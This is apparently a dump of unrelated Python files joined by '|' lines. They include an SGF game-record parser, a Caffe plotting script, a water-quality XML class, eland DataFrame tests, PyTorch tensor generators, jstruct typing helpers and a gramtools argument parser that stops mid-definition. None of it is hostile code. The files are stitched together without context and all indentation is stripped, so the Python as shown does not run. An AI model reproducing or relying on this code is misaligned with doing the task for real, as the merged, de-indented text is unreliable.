### as alternating colors, or starting with B in an even game and W with
### handicaps. The first node is the root node and should be game properties
### while following nodes should represent a game, but the nodes could
### represent setup for a problem.
###
import re
from System.IO import FileFormatException
class ParsedGame (object):
def __init__ (self):
## nodes is the only public member.
self.nodes = None
### __str__ produces a strong that when printed to a file generates a valid
### .sgf file.
###
def __str__ (self):
if self.nodes is None:
return "" ## Min tree is "(;)", but that implies one empty node
else:
return "(" + self._nodes_string(self.nodes) + ")"
### _nodes_string returns a string for a series of nodes, and the caller
### needs to supply the open and close parens that bracket the series.
###
def _nodes_string (self, nodes):
res = ""
while nodes.next is not None:
## Get one node's string with a leading newline if it is not the
## first.
res += nodes.node_str(res != "")
if nodes.branches is not None:
for n in nodes.branches:
res = res + "\n(" + self._nodes_string(n) + ")"
return res
nodes = nodes.next
res += nodes.node_str(res != "") # Test res, could be single node branch.
return res
class ParsedNode (object):
def __init__ (self):
self.next = None
self.previous = None
self.branches = None
self.properties = {}
### node_str returns the string for one node, taking a flag for a
### preceding newline and the dictionary of properties for the node.
###
def node_str (self, newline):
props = self.properties
if newline:
s = "\n;"
else:
s = ";"
## Print move property first for readability of .sgf file by humans.
if "B" in props:
s = s + "B" + self._escaped_property_values("B", props["B"])
if "W" in props:
s = s + "W" + self._escaped_property_values("W", props["W"])
for k,v in props.iteritems():
if k == "B" or k == "W": continue
s = s + k + self._escaped_property_values(k, v)
return s
### _escaped_property_values returns a node's property value with escapes so that the .sgf
### is valid. So, ] and \ must be preceded by a backslash.
###
def _escaped_property_values (self, id, values):
res = ""
for v in values:
res = res + "["
if "]" in v or "\\" in v:
tmp = []
for c in v:
if c == "]" or c == "\\":
tmp.append("\\")
tmp.append(c)
tmp.append("]")
res = res + "".join(tmp)
else:
res = res + v + "]"
return res
def parse_file (name):
f = open(name)
l = Lexer(f.read())
f.close()
l.scan_for("(", "Can't find game start")
g = ParsedGame()
g.nodes = _parse_nodes(l)
return g
### _parse_nodes returns a linked list of ParseNodes. It starts scanning for a
### semi-colon for the start of the first node. If it encounters an open
### paren, it recurses and creates branches that follow the current node,
### making the next pointer of the current node point to the first node in the
### first branch.
###
def _parse_nodes (lexer):
lexer.scan_for(";", "Must be one node in each branch")
cur_node = _parse_node(lexer)
first = cur_node
branching_yet = False
while lexer.has_data():
## Semi-colon starts another node, open paren starts a branch, close
## paren stops list of nodes. Scanning raises an exception if one of
## these chars fails to follow (ignoring whitespace).
char = lexer.scan_for(";()")
if char == ";":
if branching_yet:
raise Exception("Found node after branching started.")
cur_node.next = _parse_node(lexer)
cur_node.next.previous = cur_node
cur_node = cur_node.next
elif char == "(":
if not branching_yet:
cur_node.next = _parse_nodes(lexer)
cur_node.next.previous = cur_node
cur_node.branches = [cur_node.next]
branching_yet = True
else:
n = _parse_nodes(lexer)
n.previous = cur_node
cur_node.branches.append(n)
elif char == ')':
return first
else:
raise FileFormatException("SGF file is malformed at char " + str(lexer.Location))
raise FileFormatException("Unexpectedly hit EOF!")
### _parse_node returns a ParseNode with its properties filled in.
###
def _parse_node (lexer):
node = ParsedNode()
## Loop properties ...
while lexer.has_data():
id = lexer.get_property_id()
if not id:
return node
if node.properties.has_key(id):
raise Exception("Encountered ID, %s, twice for node -- file location %s." %
(id, lexer.location))
lexer.scan_for("[", "Expected property value")
i = None
values = []
node.properties[id] = values
## Loop values for one property
while lexer.has_data():
## C and GC properties allow newline sequences in value.
values.append(lexer.get_property_value(id == "C" or id == "GC"))
## Must bind ignore due to Python's multi-value return model.
i, ignore = lexer.peek_for("[")
if i is None: break #no new values
lexer.set_location(i)
raise FileFormatException("Unexpectedly hit EOF!")
class Lexer (object):
def __init__ (self, contents):
self._data = contents
self._data_len = len(contents)
self._index = 0
self._put_token = None
### scan_for scans for any char in chars following whitespace. If
### non-whitespace intervenes, this is an error. Scan_for leaves _index
### after char and returns found char.
###
def scan_for (self, chars, errmsg = None):
i, c = self.peek_for(chars)
if i is None:
if errmsg:
errmsg = errmsg + " -- file location %s" % self._index
raise Exception(errmsg or "Expecting one of '%s' while scanning -- file location %s" % (chars, self._index))
else:
self._index = i
return c
### peek_for scans for any char in chars following whitespace. If
### non-whitespace intervenes, this is an error. Peek_for leaves _index
### unmodified.
###
def peek_for (self, chars):
i = self._index
while self.has_data():
c = self._data[i]
i += 1
if c in " \t\n\r\f\v":
continue
elif c in chars:
return (i, c)
else:
return (None, None)
return (None, None)
def has_data (self):
return self._index < self._data_len
def location (self):
return self._index
def set_location (self, i):
self._index = i
return i
_property_id_regexp = re.compile(r'\s*([A-Za-z]+)')
### "text" properties can have newlines, newlines following \ are removed
### along with \, other escaped chars are kept verbatim except whitespace
### is converted to space.
###
### "simpletext" is the same as "text" but has no newlines.
###
def get_property_id (self):
match = self._property_id_regexp.match(self._data, self._index)
if match:
self._index = match.end()
return match.group(1)
return None
### get_property_value takes a flag as to whether un-escaped newlines get
### mapped to space or kept as-is. It gobbles all the characters after a
### '[' (which has already been consumed) up to the next ']' and returns
### them as a string. Keep_newlines distinguishes properties like C and GC
### that can have newlines in their values, but otherwise, newlines are
### assumed to be purely line-length management in the .sgf file.
###
def get_property_value (self, keep_newlines):
res = []
while self.has_data():
c = self._data[self._index]
self._index += 1
if ord(c) < ord(' '): #if < space
## Map whitespace to spaces.
newline, c2 = self._check_property_newline(c)
if newline:
## Only map newline sequences according to keep_newlines.
if keep_newlines:
res.append(c)
if c2 is not None:
res.append(c2)
else:
res.append(" ")
else:
res.append(" ")
elif c == '\\':
## Backslash quotes chars and erases newlines.
c = self._data[self._index]
self._index += 1
newline, ignore = self._check_property_newline(c)
if newline:
res.append("")
else:
res.append(c)
elif c == "]":
return "".join(res)
else:
res.append(c)
raise FileFormatException("Unexpectedly hit EOF!")
### _check_property_newline check if c is part of a newline sequence. If
### it is, then see if there's a second newline sequence char and gobble
### it. Returns whether there was a newline sequence and what the second
### char was if it was part of the newline sequence.
###
def _check_property_newline (self, c):
if c == '\n' or c == '\r':
## Only map newline sequences according to keep_newlines.
c2 = self._data[self._index]
if c2 == '\n' or c2 == '\r':
self._index += 1
return (True, c2)
return (True, None)
else:
return (False, None)
|
#!/usr/bin/env python
"""
@file plot_caffe_ensemble_logloss.py
@brief plot caffe ensemble logloss (single vs ensemble)
@author ChenglongChen
"""
import sys
import numpy as np
from matplotlib import pyplot as plt
def main():
# collect argvs
log_file_single = sys.argv[1]
log_file_ensemble = sys.argv[2]
if len(sys.argv) > 3:
pdf_file = sys.argv[3]
else:
pdf_file = sys.argv[1].split("caffemodel")[0] + "caffemodel_valid_logloss.pdf"
lines_single = open(log_file_single, "r").readlines()
logloss_single = [float(l[:-4]) for l in lines_single[1::2]]
logloss_single_mean = np.mean(logloss_single)
logloss_single_std = np.std(logloss_single)
lines_ensemble = open(log_file_ensemble, "r").readlines()
logloss_ensemble = [float(l[:-4]) for l in lines_ensemble[1::2]]
logloss_ensemble_min = np.min(logloss_ensemble)
# logloss
plt.plot(range(len(logloss_single)), logloss_single)
plt.plot(range(len(logloss_ensemble)), logloss_ensemble)
plt.plot(range(len(logloss_ensemble)), logloss_ensemble_min * np.ones((len(logloss_ensemble))))
plt.title("LogLoss vs Number of predictions")
plt.xlabel("Number of predictions")
plt.ylabel("LogLoss")
ls = "Single (Mean = %s, Std = %s)" % (np.round(logloss_single_mean,5), np.round(logloss_single_std,5))
le = "Ensemble (Min = %s)" % np.round(logloss_ensemble_min,5)
plt.legend([ls, le], loc="best")
plt.savefig(pdf_file)
print( "Save pdf figure to %s" % pdf_file )
if __name__ == "__main__":
main()
|
from typing import List, Union
from yattag import Doc
from ..exceptions import WQXException
from .BibliographicReference import BibliographicReference
from .SimpleContent import (
CellFormName,
CellShapeName,
FunctionalFeedingGroupName,
HabitName,
TaxonomicPollutionTolerance,
TaxonomicPollutionToleranceScaleText,
TrophicLevelName,
VoltinismName,
)
class TaxonomicDetails:
"""
This section allows for the further definition of user-defined details for taxa.
"""
__cellFormName: CellFormName
__cellShapeName: CellShapeName
__habitName: HabitName
__voltinismName: VoltinismName
__taxonomicPollutionTolerance: TaxonomicPollutionTolerance
__taxonomicPollutionToleranceScaleText: TaxonomicPollutionToleranceScaleText
__trophicLevelName: TrophicLevelName
__functionalFeedingGroupName: FunctionalFeedingGroupName
__taxonomicDetailsCitation: BibliographicReference
def __init__(
self,
o: dict = None,
*,
cellFormName: CellFormName = None,
cellShapeName: CellShapeName = None,
habitName: HabitName = None,
voltinismName: VoltinismName = None,
taxonomicPollutionTolerance: TaxonomicPollutionTolerance = None,
taxonomicPollutionToleranceScaleText: TaxonomicPollutionToleranceScaleText = None,
trophicLevelName: TrophicLevelName = None,
functionalFeedingGroupName: FunctionalFeedingGroupName = None,
taxonomicDetailsCitation: BibliographicReference = None
):
if isinstance(o, TaxonomicDetails):
# Assign attributes from objects without typechecking
self.__cellFormName = o.cellFormName
self.__cellShapeName = o.cellShapeName
self.__habitName = o.habitName
self.__voltinismName = o.voltinismName
self.__taxonomicPollutionTolerance = o.taxonomicPollutionTolerance
self.__taxonomicPollutionToleranceScaleText = (
o.taxonomicPollutionToleranceScaleText
)
self.__trophicLevelName = o.trophicLevelName
self.__functionalFeedingGroupName = o.functionalFeedingGroupName
self.__taxonomicDetailsCitation = o.taxonomicDetailsCitation
elif isinstance(o, dict):
# Assign attributes from dictionary with typechecking
self.cellFormName = o.get("cellFormName")
self.cellShapeName = o.get("cellShapeName")
self.habitName = o.get("habitName")
self.voltinismName = o.get("voltinismName")
self.taxonomicPollutionTolerance = o.get("taxonomicPollutionTolerance")
self.taxonomicPollutionToleranceScaleText = o.get(
"taxonomicPollutionToleranceScaleText"
)
self.trophicLevelName = o.get("trophicLevelName")
self.functionalFeedingGroupName = o.get("functionalFeedingGroupName")
self.taxonomicDetailsCitation = o.get("taxonomicDetailsCitation")
else:
# Assign attributes from named keywords with typechecking
self.cellFormName = cellFormName
self.cellShapeName = cellShapeName
self.habitName = habitName
self.voltinismName = voltinismName
self.taxonomicPollutionTolerance = taxonomicPollutionTolerance
self.taxonomicPollutionToleranceScaleText = (
taxonomicPollutionToleranceScaleText
)
self.trophicLevelName = trophicLevelName
self.functionalFeedingGroupName = functionalFeedingGroupName
self.taxonomicDetailsCitation = taxonomicDetailsCitation
@property
def cellFormName(self) -> CellFormName:
return self.__cellFormName
@cellFormName.setter
def cellFormName(self, val: CellFormName) -> None:
self.__cellFormName = None if val is None else CellFormName(val)
@property
def cellShapeName(self) -> CellShapeName:
return self.__cellShapeName
@cellShapeName.setter
def cellShapeName(self, val: CellShapeName) -> None:
self.__cellShapeName = None if val is None else CellShapeName(val)
@property
def habitName(self) -> HabitName:
return self.__habitName
@habitName.setter
def habitName(self, val: Union[HabitName, List[HabitName]]) -> None:
if val is None:
self.__habitName = []
elif isinstance(val, list):
r: List[HabitName] = []
for x in val:
r.append(HabitName(x))
self.__habitName = r
else:
self.__habitName = [HabitName(val)]
@property
def voltinismName(self) -> VoltinismName:
return self.__voltinismName
@voltinismName.setter
def voltinismName(self, val: VoltinismName) -> None:
self.__voltinismName = None if val is None else VoltinismName(val)
@property
def taxonomicPollutionTolerance(self) -> TaxonomicPollutionTolerance:
return self.__taxonomicPollutionTolerance
@taxonomicPollutionTolerance.setter
def taxonomicPollutionTolerance(self, val: TaxonomicPollutionTolerance) -> None:
self.__taxonomicPollutionTolerance = (
None if val is None else TaxonomicPollutionTolerance(val)
)
@property
def taxonomicPollutionToleranceScaleText(
self,
) -> TaxonomicPollutionToleranceScaleText:
return self.__taxonomicPollutionToleranceScaleText
@taxonomicPollutionToleranceScaleText.setter
def taxonomicPollutionToleranceScaleText(
self, val: TaxonomicPollutionToleranceScaleText
) -> None:
self.__taxonomicPollutionToleranceScaleText = (
None if val is None else TaxonomicPollutionToleranceScaleText(val)
)
@property
def trophicLevelName(self) -> TrophicLevelName:
return self.__trophicLevelName
@trophicLevelName.setter
def trophicLevelName(self, val: TrophicLevelName) -> None:
self.__trophicLevelName = None if val is None else TrophicLevelName(val)
@property
def functionalFeedingGroupName(self) -> FunctionalFeedingGroupName:
return self.__functionalFeedingGroupName
@functionalFeedingGroupName.setter
def functionalFeedingGroupName(
self, val: Union[FunctionalFeedingGroupName, List[FunctionalFeedingGroupName]]
) -> None:
if val is None:
self.__functionalFeedingGroupName = []
elif isinstance(val, list):
r: List[FunctionalFeedingGroupName] = []
for x in val:
r.append(FunctionalFeedingGroupName(x))
self.__functionalFeedingGroupName = r
else:
self.__functionalFeedingGroupName = [FunctionalFeedingGroupName(val)]
@property
def taxonomicDetailsCitation(self) -> BibliographicReference:
return self.__taxonomicDetailsCitation
@taxonomicDetailsCitation.setter
def taxonomicDetailsCitation(self, val: BibliographicReference) -> None:
self.__taxonomicDetailsCitation = (
None if val is None else BibliographicReference(val)
)
def generateXML(self, name: str = "TaxonomicDetails") -> str: # noqa: C901
doc = Doc()
asis = doc.asis
line = doc.line
tag = doc.tag
with tag(name):
if self.__cellFormName is not None:
line("CellFormName", self.__cellFormName)
if self.__cellShapeName is not None:
line("CellShapeName", self.__cellShapeName)
if len(self.__habitName) > 3:
raise WQXException(
"Attribute 'habitName' must be a list of 0 to 3 HabitName objects."
)
for x in self.__habitName:
line("HabitName", x)
if self.__voltinismName is not None:
line("VoltinismName", self.__voltinismName)
if self.__taxonomicPollutionTolerance is not None:
line("TaxonomicPollutionTolerance", self.__taxonomicPollutionTolerance)
if self.__taxonomicPollutionToleranceScaleText is not None:
line(
"TaxonomicPollutionToleranceScaleText",
self.__taxonomicPollutionToleranceScaleText,
)
if self.__trophicLevelName is not None:
line("TrophicLevelName", self.__trophicLevelName)
if len(self.__functionalFeedingGroupName) > 3:
raise WQXException(
"Attribute 'functionalFeedingGroupName' must be a list of 0 to 3 "
"FunctionalFeedingGroupName objects."
)
for x in self.__functionalFeedingGroupName:
line("FunctionalFeedingGroupName", x)
if self.__taxonomicDetailsCitation is not None:
asis(
self.__taxonomicDetailsCitation.generateXML(
"TaxonomicDetailsCitation"
)
)
return doc.getvalue()
|
"""
General-purpose components useful in all viewdom_wired apps.
"""
from dataclasses import dataclass
from viewdom import VDOM
@dataclass
class Super:
parent_children: VDOM = ()
def __call__(self) -> VDOM:
return self.parent_children
|
import sys
import os
import shutil
import setuptools
if sys.argv[-1] == "publish":
# if os.system("pip freeze | grep wheel"):
# print("wheel not installed.\nUse `pip install wheel`.\nExiting.")
# sys.exit()
if os.system("pip freeze | grep twine"):
print("twine not installed.\nUse `pip install twine`.\nExiting.")
sys.exit()
os.system("python setup.py sdist bdist_wheel")
os.system("twine upload dist/*")
shutil.rmtree("dist")
shutil.rmtree("build")
# shutil.rmtree("djangorestframework.egg-info")
sys.exit()
setuptools.setup()
|
# Copyright 2019 Elasticsearch BV
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# File called _pytest for PyCharm compatability
import pandas as pd
import pytest
from eland.dataframe import DEFAULT_NUM_ROWS_DISPLAYED
from eland.tests.common import TestData, assert_pandas_eland_series_equal
class TestDataFrameRepr(TestData):
@classmethod
def setup_class(cls):
# conftest.py changes this default - restore to original setting
pd.set_option("display.max_rows", 60)
"""
to_string
"""
def test_simple_lat_lon(self):
"""
Note on nested object order - this can change when
note this could be a bug in ES...
PUT my_index/doc/1
{
"location": {
"lat": "50.033333",
"lon": "8.570556"
}
}
GET my_index/_search
"_source": {
"location": {
"lat": "50.033333",
"lon": "8.570556"
}
}
GET my_index/_search
{
"_source": "location"
}
"_source": {
"location": {
"lon": "8.570556",
"lat": "50.033333"
}
}
Hence we store the pandas df source json as 'lon', 'lat'
"""
pd_dest_location = self.pd_flights()["DestLocation"].head(1)
ed_dest_location = self.ed_flights()["DestLocation"].head(1)
assert_pandas_eland_series_equal(pd_dest_location, ed_dest_location)
def test_num_rows_to_string(self):
# check setup works
assert pd.get_option("display.max_rows") == 60
# Test eland.DataFrame.to_string vs pandas.DataFrame.to_string
# In pandas calling 'to_string' without max_rows set, will dump ALL rows
# Test n-1, n, n+1 for edge cases
self.num_rows_to_string(DEFAULT_NUM_ROWS_DISPLAYED - 1)
self.num_rows_to_string(DEFAULT_NUM_ROWS_DISPLAYED)
with pytest.warns(UserWarning):
# UserWarning displayed by eland here (compare to pandas with max_rows set)
self.num_rows_to_string(
DEFAULT_NUM_ROWS_DISPLAYED + 1, None, DEFAULT_NUM_ROWS_DISPLAYED
)
# Test for where max_rows lt or gt num_rows
self.num_rows_to_string(10, 5, 5)
self.num_rows_to_string(100, 200, 200)
def num_rows_to_string(self, rows, max_rows_eland=None, max_rows_pandas=None):
ed_flights = self.ed_flights()[["DestLocation", "OriginLocation"]]
pd_flights = self.pd_flights()[["DestLocation", "OriginLocation"]]
ed_head = ed_flights.head(rows)
pd_head = pd_flights.head(rows)
ed_head_str = ed_head.to_string(max_rows=max_rows_eland)
pd_head_str = pd_head.to_string(max_rows=max_rows_pandas)
# print("\n", ed_head_str)
# print("\n", pd_head_str)
assert pd_head_str == ed_head_str
def test_empty_dataframe_string(self):
ed_ecom = self.ed_ecommerce()
pd_ecom = self.pd_ecommerce()
ed_ecom_s = ed_ecom[ed_ecom["currency"] == "USD"].to_string()
pd_ecom_s = pd_ecom[pd_ecom["currency"] == "USD"].to_string()
assert ed_ecom_s == pd_ecom_s
"""
repr
"""
def test_num_rows_repr(self):
self.num_rows_repr(
pd.get_option("display.max_rows") - 1, pd.get_option("display.max_rows") - 1
)
self.num_rows_repr(
pd.get_option("display.max_rows"), pd.get_option("display.max_rows")
)
self.num_rows_repr(
pd.get_option("display.max_rows") + 1, pd.get_option("display.min_rows")
)
def num_rows_repr(self, rows, num_rows_printed):
ed_flights = self.ed_flights()
pd_flights = self.pd_flights()
ed_head = ed_flights.head(rows)
pd_head = pd_flights.head(rows)
ed_head_str = repr(ed_head)
pd_head_str = repr(pd_head)
if num_rows_printed < rows:
# add 1 for ellipsis
num_rows_printed = num_rows_printed + 1
# number of rows is num_rows_printed + 3 (header, summary)
assert (num_rows_printed + 3) == len(ed_head_str.splitlines())
assert pd_head_str == ed_head_str
def test_empty_dataframe_repr(self):
ed_ecom = self.ed_ecommerce()
pd_ecom = self.pd_ecommerce()
ed_ecom_r = repr(ed_ecom[ed_ecom["currency"] == "USD"])
pd_ecom_r = repr(pd_ecom[pd_ecom["currency"] == "USD"])
assert ed_ecom_r == pd_ecom_r
"""
to_html
"""
def test_num_rows_to_html(self):
# check setup works
assert pd.get_option("display.max_rows") == 60
# Test eland.DataFrame.to_string vs pandas.DataFrame.to_string
# In pandas calling 'to_string' without max_rows set, will dump ALL rows
# Test n-1, n, n+1 for edge cases
self.num_rows_to_html(DEFAULT_NUM_ROWS_DISPLAYED - 1)
self.num_rows_to_html(DEFAULT_NUM_ROWS_DISPLAYED)
with pytest.warns(UserWarning):
# UserWarning displayed by eland here
self.num_rows_to_html(
DEFAULT_NUM_ROWS_DISPLAYED + 1, None, DEFAULT_NUM_ROWS_DISPLAYED
)
# Test for where max_rows lt or gt num_rows
self.num_rows_to_html(10, 5, 5)
self.num_rows_to_html(100, 200, 200)
def num_rows_to_html(self, rows, max_rows_eland=None, max_rows_pandas=None):
ed_flights = self.ed_flights()
pd_flights = self.pd_flights()
ed_head = ed_flights.head(rows)
pd_head = pd_flights.head(rows)
ed_head_str = ed_head.to_html(max_rows=max_rows_eland)
pd_head_str = pd_head.to_html(max_rows=max_rows_pandas)
# print(ed_head_str)
# print(pd_head_str)
assert pd_head_str == ed_head_str
def test_empty_dataframe_to_html(self):
ed_ecom = self.ed_ecommerce()
pd_ecom = self.pd_ecommerce()
ed_ecom_h = ed_ecom[ed_ecom["currency"] == "USD"].to_html()
pd_ecom_h = pd_ecom[pd_ecom["currency"] == "USD"].to_html()
assert ed_ecom_h == pd_ecom_h
"""
_repr_html_
"""
def test_num_rows_repr_html(self):
# check setup works
assert pd.get_option("display.max_rows") == 60
show_dimensions = pd.get_option("display.show_dimensions")
# TODO - there is a bug in 'show_dimensions' as it gets added after the last </div>
# For now test without this
pd.set_option("display.show_dimensions", False)
# Test eland.DataFrame.to_string vs pandas.DataFrame.to_string
# In pandas calling 'to_string' without max_rows set, will dump ALL rows
# Test n-1, n, n+1 for edge cases
self.num_rows_repr_html(pd.get_option("display.max_rows") - 1)
self.num_rows_repr_html(pd.get_option("display.max_rows"))
self.num_rows_repr_html(
pd.get_option("display.max_rows") + 1, pd.get_option("display.max_rows")
)
# Restore default
pd.set_option("display.show_dimensions", show_dimensions)
def num_rows_repr_html(self, rows, max_rows=None):
ed_flights = self.ed_flights()
pd_flights = self.pd_flights()
ed_head = ed_flights.head(rows)
pd_head = pd_flights.head(rows)
ed_head_str = ed_head._repr_html_()
pd_head_str = pd_head._repr_html_()
# print(ed_head_str)
# print(pd_head_str)
assert pd_head_str == ed_head_str
def test_empty_dataframe_repr_html(self):
# TODO - there is a bug in 'show_dimensions' as it gets added after the last </div>
# For now test without this
show_dimensions = pd.get_option("display.show_dimensions")
pd.set_option("display.show_dimensions", False)
ed_ecom = self.ed_ecommerce()
pd_ecom = self.pd_ecommerce()
ed_ecom_rh = ed_ecom[ed_ecom["currency"] == "USD"]._repr_html_()
pd_ecom_rh = pd_ecom[pd_ecom["currency"] == "USD"]._repr_html_()
# Restore default
pd.set_option("display.show_dimensions", show_dimensions)
assert ed_ecom_rh == pd_ecom_rh
|
#
# create_tensors.py
#
# Author(s):
# Matteo Spallanzani <spmatteo@iis.ee.ethz.ch>
#
# Copyright (c) 2020-2021 ETH Zurich.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from enum import IntEnum
from collections import namedtuple
import torch
from typing import Tuple
from typing import Union
class BatchSize(IntEnum):
SINGLE = 2 ** 0
SMALL = 2 ** 4
LARGE = 2 ** 8
class InputSize(IntEnum):
SMALL = 0
NORMAL = 1
LARGE = 2
class LinearSize(IntEnum):
SMALL = 2 ** 6
NORMAL = 2 ** 9
LARGE = 2 ** 12
class Conv2dChannels(IntEnum):
SMALL = 2 ** 6
NORMAL = 2 ** 8
LARGE = 2 ** 10
class Conv2dSpatialSize(IntEnum):
SMALL = 2 ** 5 # CIFAR-10
NORMAL = 2 ** 7 # ~ ImageNet / 2
LARGE = 2 ** 9 # ~ ImageNet * 2
class Kind(IntEnum):
ZEROS = 0
ONES = 1
RANDN = 2
LINSPACE = 3
Range = namedtuple('Range', ['start', 'end'])
class TensorGenerator(object):
def __init__(self,
device: torch.device,
kind: Kind,
range_: Union[Range, None] = None):
self._device = device
self._kind = kind
self._range = range_
@property
def size(self):
raise NotImplementedError
def __next__(self) -> torch.Tensor:
if self._kind == Kind.ZEROS:
x = torch.zeros(*self.size)
elif self._kind == Kind.ONES:
x = torch.ones(*self.size)
elif self._kind == Kind.RANDN:
x = torch.randn(*self.size)
elif self._kind == Kind.LINSPACE:
assert self._range is not None
from functools import reduce
n = reduce(lambda x, y: x * y, self.size)
x = torch.linspace(self._range.start, self._range.end, n).reshape(*self.size) # x.view(-1) returns the linearly spaced values in a one-dimensional array
else:
raise ValueError
return x.to(device=self._device)
class LinearTensorGenerator(TensorGenerator):
def __init__(self,
device: torch.device,
batch_size: int,
n_channels: int,
kind: Kind,
range_: Union[Range, None] = None):
super(LinearTensorGenerator, self).__init__(device, kind, range_)
self._batch_size = batch_size
self._n_channels = n_channels
@property
def size(self) -> Tuple[int, int]:
return self._batch_size, self._n_channels
class Conv2dTensorGenerator(TensorGenerator):
def __init__(self,
device: torch.device,
batch_size: int,
n_channels: int,
spatial_size: int, # I assume squared images, so one integer is sufficient
kind: Kind,
range_: Union[Range, None] = None):
super(Conv2dTensorGenerator, self).__init__(device, kind, range_)
self._batch_size = batch_size
self._n_channels = n_channels
self._spatial_size = spatial_size
@property
def size(self) -> Tuple[int, int, int, int]:
return self._batch_size, self._n_channels, self._spatial_size, self._spatial_size
|
import unittest
import pqkmeans
import numpy
import pipe
class TestPQEncoder(unittest.TestCase):
def data_source(self, n: int):
for i in range(n):
for _ in range(3):
yield [i * 100] * 6
def setUp(self):
self.encoder = pqkmeans.encoder.PQEncoder(num_subdim=2)
def test_just_train_array(self):
input_array = numpy.random.random((300, 10))
self.encoder.fit(numpy.array(input_array))
encoded = list(self.encoder.transform(numpy.array(input_array)))
self.assertEqual(len(input_array), len(encoded))
def test_fit_and_transform_generator(self):
self.encoder.fit(numpy.array(list(self.data_source(300))))
# infinite list
encoded = self.encoder.transform_generator(self.data_source(100000000)) | pipe.take(60) | pipe.as_list
for i in range(0, len(encoded), 3):
numpy.testing.assert_array_almost_equal(encoded[i], encoded[i + 1])
numpy.testing.assert_array_almost_equal(encoded[i], encoded[i + 2])
def test_transform_and_inverse_transform(self):
input_array = numpy.random.random((300, 10))
self.encoder.fit(numpy.array(input_array))
encoded = self.encoder.transform(numpy.array(input_array))
decoded = self.encoder.inverse_transform(encoded)
N1, M = encoded.shape
N2, D = decoded.shape
self.assertEqual(N1, N2)
self.assertEqual(M, self.encoder.M)
self.assertEqual(D, self.encoder.Ds * self.encoder.M)
self.assertEqual(encoded.dtype, self.encoder.code_dtype)
|
from .connection import MysqlConnection
from .queryRunner import MysqlQueryRunner
from .queryBuilder import MysqlQueryBuilder
from .tableBuilder import MysqlTableBuilder
|
import attr
import logging
from functools import reduce
from typing import List, Dict, Union, Tuple, Optional
import jstruct.utils as utils
logger = logging.getLogger(__name__)
REQUIRED = True
struct = attr.s(auto_attribs=True)
class _JStruct:
"""A typing definition wrapper used to defined nested struct.
@struct
class Child:
child_prop1: int
@struct
class Parent:
parent_prop: str
child: Child = JStruct[Child]
"""
def __getitem__(
self, arguments: Union[type, Tuple[type, Optional[bool], Optional[dict]]]
):
"""Override the `[]` operator to offer a typing wrapper syntactic sugar.
:arguments is either a `type` or a `tuple`
- type: the nested struct type (or class)
- tuple: ( type, REQUIRED, {dictionary of extra attr.ib arguments} )
:return a property initializer from attrs (attr.ib)
"""
class_, required_, *kwargs = (
arguments if isinstance(arguments, tuple) else (arguments, False)
)
def converter(args) -> class_:
return utils.instantiate(class_, args) if isinstance(args, dict) else args
default_ = dict(default=attr.NOTHING if required_ else None)
return attr.ib(**{
**default_,
"converter": converter,
**dict(reduce(lambda r, d: r + list(d.items()), kwargs, []))
})
class _JList:
"""A typing definition wrapper used to defined nested collection (list) of struct.
@struct
class Child:
child_prop1: int
@struct
class Parent:
parent_prop: str
children: List[Child] = JList[Child]
"""
def __getitem__(
self, arguments: Union[type, Tuple[type, Optional[bool], Optional[dict]]]
):
"""Override the `[]` operator to offer a typing wrapper syntactic sugar.
:arguments is either a `type` or a `tuple`
- type: the nested struct type (or class)
- tuple: ( type, REQUIRED, {dictionary of extra attr.ib arguments} )
:return a property initializer from attrs (attr.ib)
"""
class_, required_, *kwargs = (
arguments if isinstance(arguments, tuple) else (arguments, False)
)
def converter(args) -> List[class_]:
if isinstance(args, list):
items = args
else:
items = [args]
return [
(utils.instantiate(class_, item) if isinstance(item, dict) else item) for item in items
]
default_ = dict(default=attr.NOTHING if required_ else [])
return attr.ib(**{
**default_,
"converter": converter,
**dict(reduce(lambda r, d: r + list(d.items()), kwargs, []))
})
class _JDict:
"""A typing definition wrapper used to defined nested dictionary struct typing.
from jstruct import struct
from jstruct.type import _JDict
JDict = _JDict()
@struct
class Child:
child_prop1: int
@struct
class Parent:
parent_prop: str
children: Dict[str, Child] = JDict[str, Child]
"""
def __getitem__(self, arguments: Tuple[type, type, Optional[bool], Optional[dict]]):
"""Override the `[]` operator to offer a typing wrapper syntactic sugar.
:arguments is a `tuple`
( key_type, value_type, REQUIRED, {dictionary of extra attr.ib arguments} )
:return a property initializer from attrs (attr.ib)
"""
key_type, value_type, required_, *kwargs = (
arguments + (False,) if len(arguments) > 3 else arguments
)
def converter(args) -> Dict[key_type, value_type]:
return {
key_type(key): (
utils.instantiate(value_type, value)
if isinstance(value, dict) else value
)
for (key, value) in args.items()
}
default_ = dict(default=attr.NOTHING if required_ else {})
return attr.ib(**{
**default_,
"converter": converter,
**dict(reduce(lambda r, d: r + list(d.items()), kwargs, []))
})
# Instance of _JStruct
JStruct = _JStruct()
# Instance of _JList
JList = _JList()
# Instance of _JDict
JDict = _JDict()
|
def setup_parser(common_parser, subparsers):
parser = subparsers.add_parser("genotype", parents=[common_parser])
parser.add_argument(
"-i",
"--gram_dir",
help="Directory containing outputs from gramtools `build`",
dest="gram_dir",
type=str,
required=True,
)
parser.add_argument(
"-o",
"--genotype_dir",
help="Directory to hold this command's outputs.",
type=str,
dest="geno_dir",
required=True,
)
parser.add_argument(
"--reads",
help="One or more read files.\n"
"Valid formats: fastq, sam/bam/cram, fasta, txt; compressed or uncompressed; fuzzy extensions (eg fq, fsq for fastq).\n"
"Read files can be given after one or several '--reads' argument:"
"Eg '--reads rf_1.fq rf_2.fq.gz --reads rf_3.bam '",
nargs="+",
action="append",
type=str,
required=True,
)
parser.add_argument(
"--sample_id",
help="A name for your dataset.\n" "Appears in the genotyping outputs.",
required=True,
)
parser.add_argument(
"--ploidy",
help="The expected ploidy of the sample.\n" "Default: haploid",
choices=["haploid", "diploid"],
required=False,
default="haploid",
)
parser.add_argument(
"--max_threads",
